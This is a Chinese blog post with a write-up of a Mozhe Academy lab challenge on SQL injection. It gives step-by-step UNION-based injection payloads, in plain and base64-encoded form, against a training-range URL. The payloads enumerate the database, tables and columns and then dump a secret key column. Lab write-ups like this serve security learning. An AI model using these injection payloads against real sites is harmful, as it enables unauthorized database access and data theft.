墨者学院-SQL注入实战-MySQL

墨者学院-SQL注入实战-MySQL

前言

  最近在研究一些其他有趣的技术,发现很久不更靶场的题目了。

  今天做一个SQL注入的题,靶场地址如下:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

 

正文

  启动靶场环境

     观察地址栏,和一般的SQL注入不太一样,这里的参数是base64加密过的(base64加密特征就是有很多等号)

  这里直接使用火狐hackbar解密发现刚刚的参数为1

     接下来步入正题,开始SQL注入

  构造paylaod并base64加密

http://219.153.49.228:45532/show.php?id=1 -- +
http://219.153.49.228:45532/show.php?id=MSAtLSAr

  回显正常,说明闭合方式为数字型,使用二分法判读栏目数量

http://219.153.49.228:45532/show.php?id=1 order by 2 -- +
http://219.153.49.228:45532/show.php?id=MSBvcmRlciBieSAyIC0tICs=

  发现只有两个栏目

  查看报错位

http://219.153.49.228:45532/show.php?id=-1 union select 1,2 -- +
http://219.153.49.228:45532/show.php?id=LTEgdW5pb24gc2VsZWN0IDEsMiAtLSAr

  查看库名

http://219.153.49.228:45532/show.php?id=-1 union select database(),2 -- +
http://219.153.49.228:45532/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksMiAtLSAr

  库名为test,查看表名

http://219.153.49.228:45532/show.php?id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema='test' -- +
http://219.153.49.228:45532/show.php?id=LTEgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSwyIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3Rlc3QnIC0tICs=

  

  表名为data,查看列名

http://219.153.49.228:45532/show.php?id=-1 union select group_concat(column_name),2 from information_schema.columns where table_schema='test' and table_name='data' -- +
http://219.153.49.228:45532/show.php?id=LTEgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSksMiBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ndGVzdCcgYW5kIHRhYmxlX25hbWU9J2RhdGEnIC0tICs=

  直接查看thekey中的内容

http://219.153.49.228:45532/show.php?id=-1 union select group_concat(thekey),2 from data -- +
http://219.153.49.228:45532/show.php?id=LTEgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdCh0aGVrZXkpLDIgZnJvbSBkYXRhIC0tICs=

  成功得到flag

  总的来说,这个靶场还算顺利,没有遇到什么磕绊,主要是需要了解base64加密的特点以及形式

posted @ 2021-12-03 17:18  小小小怪将军  阅读(164)  评论(0编辑  收藏  举报